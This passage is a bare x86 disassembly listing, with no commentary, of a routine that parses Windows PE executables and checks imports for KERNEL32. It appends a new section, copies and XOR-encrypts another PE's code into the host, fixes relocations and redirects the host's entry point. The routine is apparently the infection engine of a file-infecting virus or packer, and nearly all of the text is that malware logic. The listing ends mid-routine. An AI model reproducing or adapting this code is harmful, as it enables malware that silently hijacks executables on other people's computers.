loc_43C4AF: ; CODE XREF: sub_43C38A+10E�j
mov eax, [ebp+var_8]
mov eax, [eax+80h]
mov [ebp+var_430], eax
mov eax, 28h
mov [ebp+var_31EE8], eax
mov edx, [ebp+var_8]
mov [ebp+var_31EF0], edx
mov ecx, [ebp+var_840]
add ecx, 0F8h
mov [ebp+var_31EEC], eax
movzx edi, word ptr [edx+6]
mul edi
mov [ebp+var_31EF4], eax
mov edx, ecx
add edx, eax
mov [ebp+var_31EFC], edx
mov eax, [ebp+var_31EE8]
mov [ebp+var_31EF8], eax
mov ecx, dword_44B0AC
inc ecx
add ecx, dword_44B108
mul ecx
mov [ebp+var_31F00], eax
mov eax, [ebp+var_31EFC]
mov edx, [ebp+var_31F00]
add eax, edx
mov edx, [ebp+var_31EF0]
add eax, [edx+0D4h]
cmp eax, [edx+54h]
ja loc_43D728
mov eax, dword_44B1C4
sub eax, 5
mov [ebp+var_20], eax
movsx eax, word_44B170
add eax, dword_44B144
sub eax, 0Dh
mov [ebp+var_C54], eax
movsx eax, word_44B0E0
add eax, dword_44B1B4
dec eax
mov [ebp+var_105C], eax
movsx eax, word_44B170
sub eax, 8
mov [ebp+var_434], eax
jmp loc_43C64A
; ---------------------------------------------------------------------------
loc_43C588: ; CODE XREF: sub_43C38A+2CD�j
mov eax, 28h
mul [ebp+var_434]
mov [ebp+var_31F0C], eax
mov eax, [ebp+var_840]
mov edx, [ebp+var_4]
lea eax, [eax+edx+0F8h]
mov edx, [ebp+var_31F0C]
mov esi, edx
add esi, eax
mov eax, [esi+0Ch]
add eax, [esi+8]
mov [ebp+var_31F04], eax
mov eax, [esi+14h]
add eax, [esi+10h]
mov [ebp+var_31F08], eax
mov eax, [ebp+var_20]
cmp [ebp+var_31F04], eax
jbe short loc_43C5DF
mov eax, [ebp+var_31F04]
mov [ebp+var_20], eax
loc_43C5DF: ; CODE XREF: sub_43C38A+24A�j
mov eax, [ebp+var_C54]
cmp [ebp+var_31F08], eax
jbe short loc_43C5F9
mov eax, [ebp+var_31F08]
mov [ebp+var_C54], eax
loc_43C5F9: ; CODE XREF: sub_43C38A+261�j
mov eax, [ebp+var_8]
mov eax, [eax+0A8h]
cmp eax, [esi+0Ch]
jb short loc_43C624
cmp eax, [ebp+var_31F04]
jnb short loc_43C624
mov eax, [esi+14h]
mov edx, [ebp+var_8]
add eax, [edx+0A8h]
sub eax, [esi+0Ch]
mov [ebp+var_105C], eax
loc_43C624: ; CODE XREF: sub_43C38A+27B�j
; sub_43C38A+283�j
mov eax, [ebp+var_430]
mov edx, [esi+0Ch]
cmp eax, edx
jb short loc_43C644
add edx, [esi+8]
cmp eax, edx
jnb short loc_43C644
sub eax, [esi+0Ch]
add eax, [esi+14h]
mov [ebp+var_848], eax
loc_43C644: ; CODE XREF: sub_43C38A+2A5�j
; sub_43C38A+2AC�j
inc [ebp+var_434]
loc_43C64A: ; CODE XREF: sub_43C38A+1F9�j
mov eax, [ebp+var_8]
movzx eax, word ptr [eax+6]
cmp [ebp+var_434], eax
jb loc_43C588
mov eax, dword_44B0A8
add eax, 0FFDh
push eax
push [ebp+var_20]
call sub_43DDCD
add esp, 8
mov [ebp+var_20], eax
mov eax, [ebp+var_C54]
cmp [ebp+var_10], eax
jz short loc_43C699
mov eax, [ebp+var_8]
mov edx, dword_44B1C0
sub edx, 3
cmp [eax+0A8h], edx
jz loc_43D728
loc_43C699: ; CODE XREF: sub_43C38A+2F5�j
mov eax, dword_44B0B4
add eax, dword_44B0A0
sub eax, 0Ch
cmp [ebp+var_105C], eax
jz loc_43C778
mov eax, dword_44B1A0
sub eax, 6
mov [ebp+var_31F0C], eax
mov eax, dword_44B134
sub eax, 3
mov [ebp+var_31F04], eax
jmp short loc_43C71F
; ---------------------------------------------------------------------------
loc_43C6D1: ; CODE XREF: sub_43C38A+3BB�j
mov eax, [ebp+var_105C]
mov [ebp+var_31F10], eax
mov eax, 1Ch
mul [ebp+var_31F04]
mov [ebp+var_31F14], eax
mov eax, [ebp+var_31F10]
mov edx, [ebp+var_31F14]
add eax, edx
add eax, [ebp+var_4]
mov [ebp+var_31F08], eax
mov edx, [ebp+var_31F0C]
cmp [eax+18h], edx
jbe short loc_43C719
mov eax, [eax+18h]
mov [ebp+var_31F0C], eax
loc_43C719: ; CODE XREF: sub_43C38A+384�j
inc [ebp+var_31F04]
loc_43C71F: ; CODE XREF: sub_43C38A+345�j
mov edi, [ebp+var_8]
mov eax, [edi+0ACh]
mov ecx, 1Ch
shr eax, 2
mov edx, 24924925h
mul edx
mov [ebp+var_31F10], edx
mov edi, edx
cmp [ebp+var_31F04], edi
jb short loc_43C6D1
mov eax, [ebp+var_8]
push dword ptr [eax+3Ch]
push [ebp+var_31F0C]
call sub_43DDCD
add esp, 8
mov [ebp+var_31F0C], eax
mov eax, [ebp+var_C54]
cmp eax, [ebp+var_10]
jz short loc_43C778
cmp [ebp+var_31F0C], eax
jnz loc_43D728
loc_43C778: ; CODE XREF: sub_43C38A+323�j
; sub_43C38A+3E0�j
and [ebp+var_1174], 0
mov eax, dword_44B1CC
movsx edx, word_44B0DC
add eax, edx
sub eax, 0Ah
mov [ebp+var_438], eax
jmp loc_43C8D5
; ---------------------------------------------------------------------------
loc_43C79B: ; CODE XREF: sub_43C38A+55A�j
mov eax, [ebp+var_848]
add eax, [ebp+var_438]
add eax, [ebp+var_4]
mov [ebp+var_32008], eax
mov edx, dword_44B0D4
dec edx
cmp [eax], edx
jz loc_43C8EA
mov eax, [ebp+var_32008]
mov eax, [eax+0Ch]
sub eax, [ebp+var_430]
add eax, [ebp+var_848]
mov [ebp+var_3200C], eax
add eax, [ebp+var_4]
push eax
lea eax, [ebp+var_32003]
push eax
call ds:dword_4471F4
add esp, 8
movsx eax, word_44B100
movsx edx, word_44B128
add eax, edx
sub eax, 9
mov [ebp+var_31F04], eax
jmp short loc_43C834
; ---------------------------------------------------------------------------
loc_43C809: ; CODE XREF: sub_43C38A+4C9�j
mov eax, [ebp+var_31F04]
mov al, [ebp+eax+var_32003]
cmp al, 61h
jle short loc_43C82E
cmp al, 7Ah
jge short loc_43C82E
mov eax, [ebp+var_31F04]
lea eax, [ebp+eax+var_32003]
sub byte ptr [eax], 20h
loc_43C82E: ; CODE XREF: sub_43C38A+48E�j
; sub_43C38A+492�j
inc [ebp+var_31F04]
loc_43C834: ; CODE XREF: sub_43C38A+47D�j
mov eax, [ebp+var_31F04]
movsx eax, [ebp+eax+var_32003]
mov edx, dword_44B13C
add edx, dword_44B098
sub edx, 9
cmp eax, edx
jnz short loc_43C809
mov eax, dword_44B1B4
cmp [ebp+eax+var_32004], 4Bh
jnz short loc_43C8CE
movsx eax, word_44B0DC
cmp byte ptr [ebp+eax+var_32008], 45h
jnz short loc_43C8CE
mov eax, dword_44B0EC
add eax, dword_44B164
cmp byte ptr [ebp+eax+var_32008+2], 52h
jnz short loc_43C8CE
movsx eax, word_44B170
movsx edx, word_44B180
add eax, edx
cmp byte ptr [ebp+eax+var_3200C], 4Ch
jnz short loc_43C8CE
movsx eax, word_44B154
cmp byte ptr [ebp+eax+var_32008+3], 33h
jnz short loc_43C8CE
mov eax, dword_44B118
cmp [ebp+eax+var_31FFD], 32h
jnz short loc_43C8CE
mov [ebp+var_1174], 1
loc_43C8CE: ; CODE XREF: sub_43C38A+4D8�j
; sub_43C38A+4E9�j ...
add [ebp+var_438], 14h
loc_43C8D5: ; CODE XREF: sub_43C38A+40C�j
mov eax, [ebp+var_8]
mov eax, [eax+84h]
cmp [ebp+var_438], eax
jb loc_43C79B
loc_43C8EA: ; CODE XREF: sub_43C38A+42F�j
cmp [ebp+var_1174], 0
jz loc_43D728
lea eax, [ebp+var_31EC3]
mov [ebp+var_42C], eax
mov ecx, [eax+3Ch]
mov [ebp+var_84C], ecx
add ecx, eax
mov [ebp+var_844], ecx
mov eax, [ebp+var_8]
mov [ebp+var_31F04], eax
movsx edx, word_44B1BC
sub edx, 6
cmp [eax+0D0h], edx
jz loc_43CAA4
mov edx, [eax+0D4h]
mov [ebp+var_31F08], edx
movsx ecx, word_44B0D0
cmp edx, ecx
jz loc_43CAA4
mov ecx, 28h
mov edi, [ebp+var_840]
add edi, 0F8h
mov eax, ecx
mov edx, [ebp+var_31F04]
movzx edx, word ptr [edx+6]
mov [ebp+var_31F0C], edx
mul edx
mov [ebp+var_31F10], eax
mov edx, edi
add edx, eax
mov [ebp+var_31F18], edx
mov eax, ecx
mov [ebp+var_31F14], eax
mov ecx, dword_44B108
add ecx, 4
mul ecx
mov [ebp+var_31F1C], eax
mov eax, [ebp+var_31F18]
mov edx, [ebp+var_31F1C]
add eax, edx
mov edx, [ebp+var_31F08]
add eax, edx
mov edx, [ebp+var_31F04]
cmp [edx+54h], eax
jbe loc_43CAA4
mov eax, [ebp+var_840]
add eax, 0F8h
mov [ebp+var_31F28], eax
mov eax, 28h
mov ecx, [ebp+var_8]
movzx ecx, word ptr [ecx+6]
mul ecx
mov [ebp+var_31F2C], eax
mov eax, [ebp+var_31F28]
mov edx, [ebp+var_31F2C]
add eax, edx
mov [ebp+var_31F20], eax
mov [ebp+var_31F30], eax
mov eax, 28h
mov ecx, [ebp+var_844]
movzx ecx, word ptr [ecx+6]
movsx edi, word_44B0BC
sub edi, 7
sub ecx, edi
mul ecx
mov [ebp+var_31F34], eax
mov eax, [ebp+var_31F30]
mov edx, [ebp+var_31F34]
add eax, edx
mov [ebp+var_31F24], eax
mov eax, [ebp+var_8]
push dword ptr [eax+0D4h]
mov eax, [ebp+var_4]
mov edx, [ebp+var_31F20]
add edx, eax
push edx
mov edx, [ebp+var_31F24]
add edx, eax
push edx
call ds:dword_449634
add esp, 0Ch
mov eax, [ebp+var_8]
add eax, 0D0h
mov [ebp+var_31F38], eax
mov eax, 28h
mov ecx, [ebp+var_844]
movzx ecx, word ptr [ecx+6]
mov edi, dword_44B130
add edi, dword_44B144
sub edi, 3
sub ecx, edi
mul ecx
mov [ebp+var_31F3C], eax
mov eax, [ebp+var_31F38]
mov edx, eax
mov ecx, [ebp+var_31F3C]
add [edx], ecx
loc_43CAA4: ; CODE XREF: sub_43C38A+5A3�j
; sub_43C38A+5BE�j ...
mov eax, [ebp+var_8]
push dword ptr [eax+3Ch]
push [ebp+var_10]
call sub_43DDCD
mov [ebp+var_10], eax
mov eax, 28h
mov ecx, [ebp+var_8]
movzx ecx, word ptr [ecx+6]
mul ecx
mov [ebp+var_31F20], eax
mov eax, [ebp+var_840]
mov edx, [ebp+var_4]
lea eax, [eax+edx+0F8h]
mov edx, [ebp+var_31F20]
mov esi, edx
add esi, eax
push offset byte_44C5CF
call sub_4424C1
push eax
push esi
call ds:dword_4471F4
mov eax, dword_44B0AC
add eax, 1FFFDh
mov [esi+8], eax
mov eax, [ebp+var_20]
mov [esi+0Ch], eax
mov eax, [ebp+var_8]
push dword ptr [eax+3Ch]
mov eax, [ebp+arg_8]
add eax, 0Dh
push eax
call sub_43DDCD
mov [esi+10h], eax
mov eax, [ebp+var_10]
mov [esi+14h], eax
mov eax, dword_44B104
add eax, 0C0000034h
movsx edx, word_44B100
add eax, edx
mov [esi+24h], eax
mov eax, dword_44B164
add eax, 6
movsx edx, word_44B180
add eax, edx
push eax
mov eax, dword_44B098
add eax, dword_44B09C
sub eax, 0Fh
push eax
mov eax, esi
add eax, 18h
push eax
call ds:dword_449640
mov eax, [ebp+var_20]
mov [ebp+var_1060], eax
mov eax, [ebp+var_10]
mov [ebp+var_850], eax
mov eax, [ebp+var_8]
push dword ptr [eax+3Ch]
mov eax, [ebp+var_10]
add eax, [esi+10h]
push eax
call sub_43DDCD
add esp, 30h
mov [ebp+var_10], eax
mov eax, dword_44B0EC
add eax, 1FFFAh
add eax, dword_44B118
add [ebp+var_20], eax
mov eax, [ebp+var_8]
add eax, 6
inc word ptr [eax]
mov eax, [ebp+var_8]
mov edx, [esi+0Ch]
add edx, [esi+8]
mov [eax+50h], edx
call ds:dword_44ABAC
mov edi, dword_44B118
movsx edx, word_44B180
add edi, edx
sub edi, 6
mov ecx, 0FDh
cdq
idiv ecx
add edi, edx
mov [ebp+var_1064], edi
mov eax, dword_44B1C8
sub eax, 2
mov edx, [ebp+var_42C]
mov ecx, edi
xor ecx, 4Dh
mov [edx+eax], cl
mov edi, dword_44B1CC
sub edi, 3
mov ecx, [ebp+arg_8]
shr ecx, 9
mov [edx+edi], cl
call ds:dword_44ABAC
mov edi, [ebp+var_84C]
mov edx, [ebp+var_42C]
mov [ebp+var_31F28], edx
mov [ebp+var_31F24], eax
mov ecx, 0FFh
cdq
idiv ecx
mov ecx, [ebp+var_31F28]
mov [ecx+edi], dl
call ds:dword_44ABAC
mov edx, dword_44B1B4
movsx ecx, word_44B114
add edx, ecx
sub edx, 2
add edi, edx
mov edx, [ebp+var_42C]
mov [ebp+var_31F30], edx
mov [ebp+var_31F2C], eax
mov ecx, 0FFh
cdq
idiv ecx
mov ecx, [ebp+var_31F30]
mov [ecx+edi], dl
mov eax, dword_44B15C
add eax, 37h
add eax, dword_44B144
mov [ebp+var_43C], eax
jmp short loc_43CCBF
; ---------------------------------------------------------------------------
loc_43CC8A: ; CODE XREF: sub_43C38A+941�j
call ds:dword_44ABAC
mov edi, [ebp+var_43C]
mov edx, [ebp+var_42C]
mov [ebp+var_31F38], edx
mov [ebp+var_31F34], eax
mov ecx, 0FFh
cdq
idiv ecx
mov ecx, [ebp+var_31F38]
mov [ecx+edi], dl
inc [ebp+var_43C]
loc_43CCBF: ; CODE XREF: sub_43C38A+8FE�j
mov eax, [ebp+var_84C]
cmp [ebp+var_43C], eax
jb short loc_43CC8A
push 0Dh
push offset dword_44B200
lea eax, [ebp+var_31ED0]
push eax
call ds:dword_449634
mov eax, [esi+10h]
add eax, 0Dh
push eax
lea eax, [ebp+var_31ED0]
push eax
mov eax, [esi+14h]
add eax, [ebp+var_4]
push eax
call ds:dword_449634
add esp, 18h
mov eax, [esi+14h]
add eax, 0Dh
mov [ebp+var_1068], eax
mov edx, dword_44B11C
add edx, dword_44B0E4
sub edx, 3
add eax, edx
mov [ebp+var_424], eax
jmp short loc_43CD3E
; ---------------------------------------------------------------------------
loc_43CD24: ; CODE XREF: sub_43C38A+9C3�j
mov eax, [ebp+var_424]
add eax, [ebp+var_4]
movzx edx, byte ptr [eax]
xor edx, [ebp+var_1064]
mov [eax], dl
inc [ebp+var_424]
loc_43CD3E: ; CODE XREF: sub_43C38A+998�j
mov eax, [ebp+var_1068]
add eax, [ebp+arg_8]
cmp [ebp+var_424], eax
jb short loc_43CD24
movsx eax, word_44B148
add eax, dword_44B1B8
sub eax, 6
mov [ebp+var_18], eax
mov eax, dword_44B164
mov [ebp+var_440], eax
jmp loc_43CFC3
; ---------------------------------------------------------------------------
loc_43CD72: ; CODE XREF: sub_43C38A+C49�j
mov eax, 28h
mul [ebp+var_440]
mov [ebp+var_31F40], eax
mov eax, [ebp+var_84C]
mov edx, [ebp+var_42C]
lea eax, [eax+edx+0F8h]
mov edx, [ebp+var_31F40]
mov ebx, edx
add ebx, eax
mov eax, 28h
mov ecx, [ebp+var_8]
movzx ecx, word ptr [ecx+6]
mul ecx
mov [ebp+var_31F44], eax
mov eax, [ebp+var_840]
mov edx, [ebp+var_4]
lea eax, [eax+edx+0F8h]
mov edx, [ebp+var_31F44]
mov esi, edx
add esi, eax
mov eax, dword_44B11C
add eax, dword_44B1B4
sub eax, 4
cmp byte ptr [ebx+eax], 2Eh
jnz short loc_43CE1B
mov eax, dword_44B1CC
movsx edx, word_44B150
add eax, edx
sub eax, 8
cmp byte ptr [ebx+eax], 72h
jnz short loc_43CE1B
mov eax, dword_44B174
add eax, dword_44B1B0
sub eax, 4
cmp byte ptr [ebx+eax], 63h
jnz short loc_43CE1B
mov eax, [ebx+14h]
mov [ebp+var_1178], eax
jmp loc_43CFBD
; ---------------------------------------------------------------------------
loc_43CE1B: ; CODE XREF: sub_43C38A+A56�j
; sub_43C38A+A6D�j ...
movsx eax, word_44B1A8
cmp byte ptr [ebx+eax], 2Eh
jnz short loc_43CE62
mov eax, dword_44B104
sub eax, 2
cmp byte ptr [ebx+eax], 65h
jnz short loc_43CE62
mov eax, dword_44B1AC
inc eax
movsx edx, word_44B0D0
add eax, edx
cmp byte ptr [ebx+eax], 61h
jnz short loc_43CE62
mov eax, [ebx+14h]
mov [ebp+var_117C], eax
mov eax, [ebx+0Ch]
mov [ebp+var_1180], eax
jmp loc_43CFBD
; ---------------------------------------------------------------------------
loc_43CE62: ; CODE XREF: sub_43C38A+A9C�j
; sub_43C38A+AAA�j ...
mov eax, dword_44B140
add eax, dword_44B0B8
sub eax, 0Ch
cmp byte ptr [ebx+eax], 2Eh
jnz short loc_43CE9E
movsx eax, word_44B0D8
add eax, dword_44B1B0
sub eax, 4
cmp byte ptr [ebx+eax], 69h
jnz short loc_43CE9E
mov eax, dword_44B0D4
add eax, 4
cmp byte ptr [ebx+eax], 61h
jz loc_43CFBD
loc_43CE9E: ; CODE XREF: sub_43C38A+AEA�j
; sub_43C38A+B00�j
push ebx
push esi
call ds:dword_4471F4
mov eax, [ebx+8]
mov [esi+8], eax
mov eax, [ebp+var_20]
mov [esi+0Ch], eax
mov eax, [ebx+10h]
mov [esi+10h], eax
mov eax, [ebp+var_10]
mov [esi+14h], eax
mov eax, [ebx+24h]
mov [esi+24h], eax
mov eax, dword_44B0F0
inc eax
add eax, dword_44B10C
push eax
mov eax, dword_44B11C
sub eax, 3
push eax
mov eax, esi
add eax, 18h
push eax
call ds:dword_449640
mov edi, [ebp+var_18]
mov edx, [ebx+0Ch]
mov [ebp+edi*4+var_420], edx
mov edx, [ebx+8]
mov [ebp+edi*4+var_83C], edx
mov edx, [esi+0Ch]
mov [ebp+edi*4+var_C4C], edx
mov edx, [esi+14h]
mov [ebp+edi*4+var_1050], edx
inc [ebp+var_18]
mov eax, [ebx+10h]
add [ebp+var_10], eax
mov eax, [ebp+var_10]
mov [ebp+var_31F3C], eax
mov eax, [ebp+var_8]
push dword ptr [eax+3Ch]
push [ebp+var_10]
call sub_43DDCD
add esp, 1Ch
mov [ebp+var_10], eax
mov eax, dword_44B0F0
add eax, dword_44B1C8
sub eax, 5
cmp byte ptr [ebx+eax], 64h
jnz short loc_43CF6B
mov eax, [ebp+var_31F3C]
cmp [ebp+var_10], eax
jbe short loc_43CF6B
mov ecx, [ebp+var_10]
sub ecx, eax
mov [ebp+var_31F48], ecx
mov eax, ecx
add [esi+8], eax
mov eax, ecx
add [esi+10h], eax
loc_43CF6B: ; CODE XREF: sub_43C38A+BBF�j
; sub_43C38A+BCA�j
mov eax, dword_44B158
add eax, 0FFAh
add eax, dword_44B17C
push eax
mov eax, [ebp+var_20]
add eax, [ebx+8]
push eax
call sub_43DDCD
mov [ebp+var_20], eax
mov eax, [ebp+var_8]
add eax, 6
inc word ptr [eax]
mov eax, [ebp+var_8]
mov edx, [esi+0Ch]
add edx, [ebx+8]
mov [eax+50h], edx
push dword ptr [esi+10h]
mov eax, [ebx+14h]
add eax, [ebp+var_42C]
push eax
mov eax, [esi+14h]
add eax, [ebp+var_4]
push eax
call ds:dword_449634
add esp, 14h
loc_43CFBD: ; CODE XREF: sub_43C38A+A8C�j
; sub_43C38A+AD3�j ...
inc [ebp+var_440]
loc_43CFC3: ; CODE XREF: sub_43C38A+9E3�j
mov eax, [ebp+var_844]
movzx eax, word ptr [eax+6]
cmp [ebp+var_440], eax
jb loc_43CD72
mov eax, [ebp+var_1178]
add eax, [ebp+var_42C]
mov [ebp+var_14], eax
loc_43CFE8: ; CODE XREF: sub_43C38A+E9B�j
mov eax, dword_44B12C
movsx edx, word_44B180
add eax, edx
sub eax, 0Bh
mov [ebp+var_1C], eax
jmp short loc_43D05A
; ---------------------------------------------------------------------------
loc_43CFFE: ; CODE XREF: sub_43C38A+CD6�j
mov edi, [ebp+var_1C]
mov edx, [ebp+var_14]
mov edx, [edx]
cmp [ebp+edi*4+var_420], edx
jnz short loc_43D01A
mov eax, [ebp+var_14]
mov eax, [eax]
mov [ebp+var_C50], eax
loc_43D01A: ; CODE XREF: sub_43C38A+C83�j
mov edi, [ebp+var_1C]
shl edi, 2
mov edx, [ebp+edi+var_420]
add edx, [ebp+edi+var_83C]
mov edi, [ebp+var_14]
cmp edx, [edi]
jbe short loc_43D057
mov edi, [ebp+var_1C]
mov edi, [ebp+edi*4+var_1050]
mov [ebp+var_106C], edi
mov edi, [ebp+var_1C]
mov edi, [ebp+edi*4+var_C4C]
mov [ebp+var_1054], edi
jmp short loc_43D062
; ---------------------------------------------------------------------------
loc_43D057: ; CODE XREF: sub_43C38A+CA9�j
inc [ebp+var_1C]
loc_43D05A: ; CODE XREF: sub_43C38A+C72�j
mov eax, [ebp+var_18]
cmp [ebp+var_1C], eax
jb short loc_43CFFE
loc_43D062: ; CODE XREF: sub_43C38A+CCB�j
movsx eax, word_44B180
add eax, dword_44B138
sub eax, 0Eh
mov [ebp+var_428], eax
jmp loc_43D1EB
; ---------------------------------------------------------------------------
loc_43D07D: ; CODE XREF: sub_43C38A+E6D�j
mov eax, [ebp+var_428]
movsx edx, word_44B090
add edx, 7
add eax, edx
add eax, [ebp+var_14]
mov [ebp+var_31F40], eax
mov ax, [eax]
mov word ptr [ebp+var_31F3C], ax
movzx eax, word ptr [ebp+var_31F3C]
mov edx, dword_44B0A0
sub edx, 4
cmp eax, edx
jz loc_43D1FD
movzx edi, word ptr [ebp+var_31F3C]
mov ecx, dword_44B198
add ecx, 4
sar edi, cl
mov word ptr [ebp+var_31F44+2], di
movzx edi, word ptr [ebp+var_31F3C]
mov edx, dword_44B1CC
add edx, dword_44B104
mov ecx, edx
sub ecx, 3
shl edi, cl
mov word ptr [ebp+var_31F3C+2], di
movzx edi, word ptr [ebp+var_31F3C+2]
mov ecx, dword_44B098
sub ecx, 3
sar edi, cl
mov word ptr [ebp+var_31F3C+2], di
movzx eax, word ptr [ebp+var_31F3C+2]
mov edx, dword_44B10C
add edx, dword_44B164
sub edx, 7
cmp eax, edx
jnz short loc_43D143
movsx eax, word_44B100
add eax, dword_44B104
sub eax, 0Ch
cmp [ebp+var_428], eax
jnz loc_43D1FD
loc_43D143: ; CODE XREF: sub_43C38A+D9B�j
mov eax, [ebp+var_844]
mov eax, [eax+34h]
mov edx, [ebp+var_14]
add eax, [edx]
movzx edx, word ptr [ebp+var_31F3C+2]
add eax, edx
mov [ebp+var_31F48], eax
mov eax, [ebp+var_8]
mov eax, [eax+34h]
add eax, [ebp+var_1054]
mov edx, [ebp+var_14]
add eax, [edx]
sub eax, [ebp+var_C50]
movzx edx, word ptr [ebp+var_31F3C+2]
add eax, edx
mov [ebp+var_31F4C], eax
sub eax, [ebp+var_31F48]
mov [ebp+var_31F50], eax
movzx eax, word ptr [ebp+var_31F44+2]
mov edx, dword_44B098
add edx, dword_44B18C
sub edx, 5
cmp eax, edx
jnz short loc_43D1D7
mov eax, [ebp+var_106C]
mov edx, [ebp+var_14]
add eax, [edx]
sub eax, [ebp+var_C50]
movzx edx, word ptr [ebp+var_31F3C+2]
add eax, edx
add eax, [ebp+var_4]
mov [ebp+var_31F54], eax
mov edx, [ebp+var_31F50]
add [eax], edx
loc_43D1D7: ; CODE XREF: sub_43C38A+E20�j
mov eax, dword_44B17C
add eax, dword_44B0C4
sub eax, 8
add [ebp+var_428], eax
loc_43D1EB: ; CODE XREF: sub_43C38A+CEE�j
mov eax, [ebp+var_14]
mov eax, [eax+4]
cmp [ebp+var_428], eax
jb loc_43D07D
loc_43D1FD: ; CODE XREF: sub_43C38A+D2A�j
; sub_43C38A+DB3�j
mov eax, [ebp+var_14]
mov edx, [eax+4]
add edx, eax
mov [ebp+var_14], edx
mov eax, [ebp+var_844]
mov eax, [eax+0A4h]
mov edx, [ebp+var_1178]
add edx, [ebp+var_42C]
add eax, edx
cmp [ebp+var_14], eax
jb loc_43CFE8
mov eax, [ebp+var_8]
mov ecx, [eax+28h]
mov [ebp+var_1184], ecx
mov edx, [ebp+var_1060]
mov [eax+28h], edx
add eax, 60h
mov edx, [ebp+var_844]
mov edx, [edx+60h]
add [eax], edx
mov eax, [ebp+var_8]
add eax, 68h
mov edx, [ebp+var_844]
mov edx, [edx+68h]
add [eax], edx
mov eax, [ebp+var_8]
movsx edx, word_44B0B0
mov ecx, dword_44B120
lea edx, [edx+ecx+3]
mov [eax+44h], dx
movsx edx, word_44B110
mov ecx, dword_44B0AC
lea edx, [edx+ecx+1]
mov [eax+1Ah], dl
movsx eax, word_44B110
mov edx, [ebp+var_8]
mov ecx, eax
add ecx, eax
mov eax, ecx
sub eax, 7
mov [edx+46h], ax
mov eax, [ebp+var_117C]
add eax, [ebp+var_42C]
mov [ebp+var_31EDC], eax
mov eax, [ebp+var_117C]
mov edx, [ebp+var_31EDC]
add eax, [edx+1Ch]
sub eax, [ebp+var_1180]
mov [ebp+var_31EE0], eax
add eax, [ebp+var_42C]
mov [ebp+var_31EE4], eax
mov eax, [eax]
mov [ebp+var_1058], eax
movsx eax, word_44B100
add eax, dword_44B0C0
sub eax, 0Ah
mov [ebp+var_24], eax
jmp short loc_43D339
; ---------------------------------------------------------------------------
loc_43D2F8: ; CODE XREF: sub_43C38A+FB5�j
mov edi, [ebp+var_24]
shl edi, 2
mov edx, [ebp+edi+var_420]
add edx, [ebp+edi+var_83C]
cmp edx, [ebp+var_1058]
jbe short loc_43D336
mov edi, [ebp+var_24]
mov edi, [ebp+edi*4+var_420]
mov [ebp+var_1188], edi
mov edi, [ebp+var_24]
mov edi, [ebp+edi*4+var_C4C]
mov [ebp+var_1190], edi
jmp short loc_43D341
; ---------------------------------------------------------------------------
loc_43D336: ; CODE XREF: sub_43C38A+F88�j
inc [ebp+var_24]
loc_43D339: ; CODE XREF: sub_43C38A+F6C�j
mov eax, [ebp+var_18]
cmp [ebp+var_24], eax
jb short loc_43D2F8
loc_43D341: ; CODE XREF: sub_43C38A+FAA�j
mov eax, [ebp+var_8]
mov eax, [eax+34h]
add eax, [ebp+var_1190]
add eax, [ebp+var_1058]
sub eax, [ebp+var_1188]
mov [ebp+var_118C], eax
mov eax, [ebp+var_844]
mov eax, [eax+34h]
add eax, [ebp+var_1058]
mov [ebp+var_1058], eax
mov eax, [ebp+var_850]
mov [ebp+var_C], eax
jmp loc_43D5F8
; ---------------------------------------------------------------------------
loc_43D382: ; CODE XREF: sub_43C38A+127A�j
mov eax, [ebp+var_C]
mov edx, [ebp+var_4]
mov [ebp+var_31F3C], edx
mov ecx, dword_44B0F8
movzx edi, byte ptr [edx+eax]
movsx edx, word_44B150
lea edx, [edx+ecx+0E2h]
cmp edi, edx
jnz loc_43D4CD
mov edx, dword_44B188
add edx, dword_44B0C0
mov edi, eax
add edi, edx
mov edx, [ebp+var_31F3C]
movzx edx, byte ptr [edx+edi]
movsx edi, word_44B0D0
add edi, dword_44B1B0
cmp edx, edi
jnz loc_43D4CD
mov edx, eax
add edx, ecx
mov ecx, [ebp+var_31F3C]
movzx edx, byte ptr [ecx+edx]
movsx ecx, word_44B168
movsx edi, word_44B0F4
add ecx, edi
sub ecx, 11h
cmp edx, ecx
jnz loc_43D4CD
mov edx, dword_44B1B4
add edx, 2
mov ecx, eax
add ecx, edx
mov edx, [ebp+var_31F3C]
movzx edx, byte ptr [edx+ecx]
cmp edx, dword_44B108
jnz loc_43D4CD
mov edx, dword_44B1AC
add edx, dword_44B1A0
sub edx, 6
add eax, edx
mov edx, [ebp+var_31F3C]
movzx eax, byte ptr [edx+eax]
movsx edx, word_44B114
movsx ecx, word_44B154
add edx, ecx
sub edx, 0Ah
cmp eax, edx
jnz short loc_43D4CD
mov eax, [ebp+var_8]
mov eax, [eax+34h]
add eax, [ebp+var_1060]
mov edx, [ebp+var_C]
sub edx, [ebp+var_850]
add eax, edx
mov [ebp+var_31F40], eax
mov eax, [ebp+var_8]
mov eax, [eax+34h]
add eax, [ebp+var_1184]
mov [ebp+var_31F44], eax
mov eax, dword_44B130
add eax, 0FFFFFFFFh
sub eax, [ebp+var_31F40]
add eax, [ebp+var_31F44]
movsx edx, word_44B0D0
add edx, 4
sub eax, edx
mov [ebp+var_31F48], eax
mov edi, dword_44B17C
mov edx, [ebp+var_C]
mov ecx, dword_44B0C4
sub ecx, 3
add edx, ecx
add edx, [ebp+var_4]
mov ecx, eax
mov [edx+edi*4-18h], ecx
loc_43D4CD: ; CODE XREF: sub_43C38A+101E�j
; sub_43C38A+104D�j ...
mov eax, [ebp+var_C]
mov edx, [ebp+var_4]
movzx ecx, byte ptr [edx+eax]
mov edi, dword_44B1A4
add edi, 0E0h
add edi, dword_44B0B4
cmp ecx, edi
jnz loc_43D5F5
mov ecx, dword_44B10C
sub ecx, 6
mov edi, eax
add edi, ecx
movzx ecx, byte ptr [edx+edi]
mov edi, dword_44B140
sub edi, 8
cmp ecx, edi
jnz loc_43D5F5
movsx ecx, word_44B110
sub ecx, 2
mov edi, eax
add edi, ecx
movzx ecx, byte ptr [edx+edi]
movsx edi, word_44B1A8
cmp ecx, edi
jnz loc_43D5F5
movsx ecx, word_44B128
add ecx, 3
mov edi, eax
add edi, ecx
movzx ecx, byte ptr [edx+edi]
movsx edi, word_44B0B0
sub edi, 8
cmp ecx, edi
jnz loc_43D5F5
add eax, dword_44B0B8
movzx eax, byte ptr [edx+eax]
mov edx, dword_44B144
sub edx, 5
cmp eax, edx
jnz loc_43D5F5
mov eax, [ebp+var_8]
mov eax, [eax+34h]
add eax, [ebp+var_1060]
mov edx, [ebp+var_C]
sub edx, [ebp+var_850]
add eax, edx
mov [ebp+var_31F40], eax
mov eax, [ebp+var_118C]
mov [ebp+var_31F44], eax
mov eax, dword_44B0F0
add eax, 0FFFFFFFBh
sub eax, [ebp+var_31F40]
